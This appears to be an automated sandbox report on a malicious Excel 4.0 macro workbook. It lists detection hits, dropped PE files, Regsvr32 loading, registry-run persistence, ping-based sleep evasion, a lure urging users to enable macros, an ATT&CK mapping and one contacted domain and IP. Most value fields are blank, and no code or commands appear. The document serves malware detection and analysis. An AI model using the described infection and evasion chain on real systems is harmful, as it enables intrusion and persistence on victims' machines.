Analysis Report Documents_13134976_1377491379.xlsb
Overview
General Information
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
Process Tree |
---|
|
Malware Configuration |
---|
No configs have been found |
---|
Yara Overview |
---|
Initial Sample |
---|
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_XlsWithMacro4 | Yara detected Xls With Macro 4.0 | Joe Security |
Sigma Overview |
---|
System Summary: |
---|
Sigma detected: BlueMashroom DLL Load | Show sources |
Source: | Author: Florian Roth: |
Sigma detected: Microsoft Office Product Spawning Windows Shell | Show sources |
Source: | Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: |
Sigma detected: Regsvr32 Anomaly | Show sources |
Source: | Author: Florian Roth, oscd.community: |
Signature Overview |
---|
Click to jump to signature section
Source: | File opened: | Jump to behavior |
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: |
Source: | Code function: | 5_2_00007FFD696B3714 | |
Source: | Code function: | 11_2_00007FFD69653714 |
Software Vulnerabilities: |
---|
Document exploit detected (creates forbidden files) | Show sources |
Source: | File created: | Jump to behavior | ||
Source: | File created: | Jump to behavior |
Document exploit detected (drops PE files) | Show sources |
Source: | File created: | Jump to dropped file |
Document exploit detected (UrlDownloadToFile) | Show sources |
Source: | Section loaded: | Jump to behavior |
Document exploit detected (process start blacklist hit) | Show sources |
Source: | Process created: |
Source: | DNS query: |
Source: | TCP traffic: |
Source: | TCP traffic: |
Networking: |
---|
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) | Show sources |
Source: | Snort IDS: | ||
Source: | Snort IDS: | ||
Source: | Snort IDS: |
Uses ping.exe to check the status of other devices and networks | Show sources |
Source: | Process created: |
Source: | ASN Name: |
Source: | JA3 fingerprint: | ||
Source: | JA3 fingerprint: |
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: |
Source: | DNS traffic detected: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: |
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: |
System Summary: |
---|
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) | Show sources |
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: |
Found Excel 4.0 Macro with suspicious formulas | Show sources |
Source: | Initial sample: | ||
Source: | Initial sample: | ||
Source: | Initial sample: |
Office process drops PE file | Show sources |
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file |
Source: | Code function: | 5_2_00007FFD696A6DAE | |
Source: | Code function: | 5_2_00007FFD696B2254 | |
Source: | Code function: | 5_2_00007FFD696B8E18 | |
Source: | Code function: | 5_2_00007FFD696AF1F0 | |
Source: | Code function: | 5_2_00007FFD696B3508 | |
Source: | Code function: | 5_2_00007FFD696A1788 | |
Source: | Code function: | 5_2_00007FFD696A204C | |
Source: | Code function: | 5_2_00007FFD696A1284 | |
Source: | Code function: | 5_2_012D8D11 | |
Source: | Code function: | 5_2_012D4554 | |
Source: | Code function: | 5_2_012E02A4 | |
Source: | Code function: | 5_2_012D8282 | |
Source: | Code function: | 5_2_012D6537 | |
Source: | Code function: | 5_2_012D6118 | |
Source: | Code function: | 5_2_012D1517 | |
Source: | Code function: | 5_2_012DD57B | |
Source: | Code function: | 5_2_012D8598 | |
Source: | Code function: | 5_2_012DE007 | |
Source: | Code function: | 5_2_012DFC4D | |
Source: | Code function: | 5_2_012E0CE8 | |
Source: | Code function: | 5_2_012DA8E0 | |
Source: | Code function: | 5_2_012D2B26 | |
Source: | Code function: | 5_2_012D9F06 | |
Source: | Code function: | 5_2_012D3B01 | |
Source: | Code function: | 5_2_012D7F12 | |
Source: | Code function: | 5_2_012D5372 | |
Source: | Code function: | 5_2_012E26AC | |
Source: | Code function: | 5_2_012DC6ED | |
Source: | Code function: | 5_2_012D5EF8 | |
Source: | Code function: | 11_2_00007FFD69646DAE | |
Source: | Code function: | 11_2_00007FFD69652254 | |
Source: | Code function: | 11_2_00007FFD69658E18 | |
Source: | Code function: | 11_2_00007FFD6964F1F0 | |
Source: | Code function: | 11_2_00007FFD69653508 | |
Source: | Code function: | 11_2_00007FFD69641788 | |
Source: | Code function: | 11_2_00007FFD6964204C | |
Source: | Code function: | 11_2_00007FFD69641284 | |
Source: | Code function: | 11_2_005C8282 | |
Source: | Code function: | 11_2_005D02A4 | |
Source: | Code function: | 11_2_005CFC4D | |
Source: | Code function: | 11_2_005CE007 | |
Source: | Code function: | 11_2_005D0CE8 | |
Source: | Code function: | 11_2_005CA8E0 | |
Source: | Code function: | 11_2_005C4554 | |
Source: | Code function: | 11_2_005CD57B | |
Source: | Code function: | 11_2_005C6118 | |
Source: | Code function: | 11_2_005C1517 | |
Source: | Code function: | 11_2_005C8D11 | |
Source: | Code function: | 11_2_005C6537 | |
Source: | Code function: | 11_2_005C8598 | |
Source: | Code function: | 11_2_005C5EF8 | |
Source: | Code function: | 11_2_005CC6ED | |
Source: | Code function: | 11_2_005D26AC | |
Source: | Code function: | 11_2_005C5372 | |
Source: | Code function: | 11_2_005C7F12 | |
Source: | Code function: | 11_2_005C9F06 | |
Source: | Code function: | 11_2_005C3B01 | |
Source: | Code function: | 11_2_005C2B26 | |
Source: | Code function: | 18_2_0045A8E0 | |
Source: | Code function: | 18_2_00458282 | |
Source: | Code function: | 18_2_004602A4 | |
Source: | Code function: | 18_2_0045FC4D | |
Source: | Code function: | 18_2_00454554 | |
Source: | Code function: | 18_2_0045C6ED | |
Source: | Code function: | 18_2_00460CE8 | |
Source: | Code function: | 18_2_00455372 | |
Source: | Code function: | 18_2_00455EF8 | |
Source: | Code function: | 18_2_0045D57B | |
Source: | Code function: | 18_2_0045E007 | |
Source: | Code function: | 18_2_00459F06 | |
Source: | Code function: | 18_2_00453B01 | |
Source: | Code function: | 18_2_00451517 | |
Source: | Code function: | 18_2_00458D11 | |
Source: | Code function: | 18_2_00457F12 | |
Source: | Code function: | 18_2_00458598 | |
Source: | Code function: | 18_2_00456118 | |
Source: | Code function: | 18_2_00452B26 | |
Source: | Code function: | 18_2_004626AC | |
Source: | Code function: | 18_2_00456537 | |
Source: | Code function: | 25_2_00A202A4 | |
Source: | Code function: | 25_2_00A12B26 | |
Source: | Code function: | 25_2_00A16537 | |
Source: | Code function: | 25_2_00A14554 | |
Source: | Code function: | 25_2_00A226AC | |
Source: | Code function: | 25_2_00A13B01 | |
Source: | Code function: | 25_2_00A18282 | |
Source: | Code function: | 25_2_00A1E007 | |
Source: | Code function: | 25_2_00A19F06 | |
Source: | Code function: | 25_2_00A18D11 | |
Source: | Code function: | 25_2_00A17F12 | |
Source: | Code function: | 25_2_00A11517 | |
Source: | Code function: | 25_2_00A18598 | |
Source: | Code function: | 25_2_00A16118 | |
Source: | Code function: | 25_2_00A1A8E0 | |
Source: | Code function: | 25_2_00A20CE8 | |
Source: | Code function: | 25_2_00A1C6ED | |
Source: | Code function: | 25_2_00A15372 | |
Source: | Code function: | 25_2_00A15EF8 | |
Source: | Code function: | 25_2_00A1D57B | |
Source: | Code function: | 25_2_00A1FC4D | |
Source: | Code function: | 26_2_00FD6537 | |
Source: | Code function: | 26_2_00FE02A4 | |
Source: | Code function: | 26_2_00FD5EF8 | |
Source: | Code function: | 26_2_00FDD57B | |
Source: | Code function: | 26_2_00FD5372 | |
Source: | Code function: | 26_2_00FDC6ED | |
Source: | Code function: | 26_2_00FE0CE8 | |
Source: | Code function: | 26_2_00FDA8E0 | |
Source: | Code function: | 26_2_00FD4554 | |
Source: | Code function: | 26_2_00FDFC4D | |
Source: | Code function: | 26_2_00FE26AC | |
Source: | Code function: | 26_2_00FD2B26 | |
Source: | Code function: | 26_2_00FD8598 | |
Source: | Code function: | 26_2_00FD6118 | |
Source: | Code function: | 26_2_00FD1517 | |
Source: | Code function: | 26_2_00FD8D11 | |
Source: | Code function: | 26_2_00FD7F12 | |
Source: | Code function: | 26_2_00FDE007 | |
Source: | Code function: | 26_2_00FD9F06 | |
Source: | Code function: | 26_2_00FD3B01 | |
Source: | Code function: | 26_2_00FD8282 | |
Source: | Code function: | 27_2_00B76537 | |
Source: | Code function: | 27_2_00B802A4 | |
Source: | Code function: | 27_2_00B74554 | |
Source: | Code function: | 27_2_00B72B26 | |
Source: | Code function: | 27_2_00B826AC | |
Source: | Code function: | 27_2_00B71517 | |
Source: | Code function: | 27_2_00B77F12 | |
Source: | Code function: | 27_2_00B78D11 | |
Source: | Code function: | 27_2_00B78598 | |
Source: | Code function: | 27_2_00B76118 | |
Source: | Code function: | 27_2_00B7E007 | |
Source: | Code function: | 27_2_00B79F06 | |
Source: | Code function: | 27_2_00B78282 | |
Source: | Code function: | 27_2_00B73B01 | |
Source: | Code function: | 27_2_00B75372 | |
Source: | Code function: | 27_2_00B7D57B | |
Source: | Code function: | 27_2_00B75EF8 | |
Source: | Code function: | 27_2_00B80CE8 | |
Source: | Code function: | 27_2_00B7A8E0 | |
Source: | Code function: | 27_2_00B7C6ED | |
Source: | Code function: | 27_2_00B7FC4D |
Source: | Dropped File: | ||
Source: | Dropped File: | ||
Source: | Dropped File: |
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior |
Source: | Classification label: |
Source: | Code function: | 5_2_012D4554 |
Source: | File created: | Jump to behavior |
Source: | Mutant created: | ||
Source: | Mutant created: | ||
Source: | Mutant created: | ||
Source: | Mutant created: |
Source: | File created: | Jump to behavior |
Source: | File read: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | File read: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Window detected: |
Source: | Initial sample: | ||
Source: | Initial sample: | ||
Source: | Initial sample: | ||
Source: | Initial sample: | ||
Source: | Initial sample: | ||
Source: | Initial sample: |
Source: | Key opened: | Jump to behavior |
Source: | File opened: | Jump to behavior |
Source: | Process created: |
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file |
Source: | File created: | Jump to dropped file |
Boot Survival: |
---|
Creates an autostart registry key pointing to binary in C:\Windows | Show sources |
Source: | Registry value created or modified: | Jump to behavior |
Drops PE files to the user root directory | Show sources |
Source: | File created: | Jump to dropped file |
Source: | Registry value created or modified: | Jump to behavior | ||
Source: | Registry value created or modified: | Jump to behavior |
Source: | Registry key monitored for changes: | Jump to behavior |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Malware Analysis System Evasion: |
---|
Uses ping.exe to sleep | Show sources |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Dropped PE file which has not been started: | Jump to dropped file |
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior |
Source: | Last function: | ||
Source: | Last function: | ||
Source: | Last function: | ||
Source: | Last function: | ||
Source: | Last function: | ||
Source: | Last function: | ||
Source: | Last function: |
Source: | Code function: | 5_2_00007FFD696A9D9D | |
Source: | Code function: | 11_2_00007FFD69649D9D |
Source: | Code function: | 5_2_00007FFD696B3714 | |
Source: | Code function: | 11_2_00007FFD69653714 |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Process information queried: | Jump to behavior |
Source: | Code function: | 5_2_00007FFD696B31A0 |
Source: | Code function: | 5_2_00007FFD696A4402 |
Source: | Code function: | 5_2_00007FFD696B31A0 | |
Source: | Code function: | 5_2_00007FFD696B03CC | |
Source: | Code function: | 5_2_00007FFD696AFC50 | |
Source: | Code function: | 11_2_00007FFD696531A0 | |
Source: | Code function: | 11_2_00007FFD696503CC | |
Source: | Code function: | 11_2_00007FFD6964FC50 |
HIPS / PFW / Operating System Protection Evasion: |
---|
System process connects to network (likely due to code injection or exploit) | Show sources |
Source: | Network Connect: | Jump to behavior |
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | File source: |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Code function: | 5_2_00007FFD696B8940 |
Source: | Code function: | 5_2_00007FFD696B02C8 |
Source: | Key value queried: | Jump to behavior |
Mitre Att&ck Matrix |
---|
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | Scripting1 | Registry Run Keys / Startup Folder11 | Process Injection112 | Masquerading111 | OS Credential Dumping | System Time Discovery1 | Remote Services | Archive Collected Data1 | Exfiltration Over Other Network Medium | Encrypted Channel12 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | Exploitation for Client Execution43 | DLL Side-Loading1 | Registry Run Keys / Startup Folder11 | Disable or Modify Tools1 | LSASS Memory | Query Registry1 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Non-Application Layer Protocol1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | At (Linux) | Logon Script (Windows) | DLL Side-Loading1 | Virtualization/Sandbox Evasion11 | Security Account Manager | Security Software Discovery21 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Application Layer Protocol2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection112 | NTDS | Virtualization/Sandbox Evasion11 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | Carrier Billing Fraud | |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Scripting1 | LSA Secrets | Process Discovery3 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings | |
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Regsvr321 | Cached Domain Credentials | Remote System Discovery11 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features | |
External Remote Services | Scheduled Task | Startup Items | Startup Items | DLL Side-Loading1 | DCSync | System Network Configuration Discovery1 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact | |
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | File and Directory Discovery2 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue | |
Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Masquerading | /etc/passwd and /etc/shadow | System Information Discovery24 | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | Data Destruction |
Behavior Graph |
---|
Screenshots |
---|
Thumbnails
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Antivirus, Machine Learning and Genetic Malware Detection |
---|
Initial Sample |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
2% | ReversingLabs |
Dropped Files |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
6% | Metadefender | Browse | ||
4% | ReversingLabs | |||
6% | Metadefender | Browse | ||
4% | ReversingLabs | |||
6% | Metadefender | Browse | ||
4% | ReversingLabs |
Unpacked PE Files |
---|
No Antivirus matches |
---|
Domains |
---|
No Antivirus matches |
---|
URLs |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe |
Domains and IPs |
---|
Contacted Domains |
---|
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
tpfcu.com | 107.180.50.232 | true | false | unknown |
URLs from Memory and Binaries |
---|
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
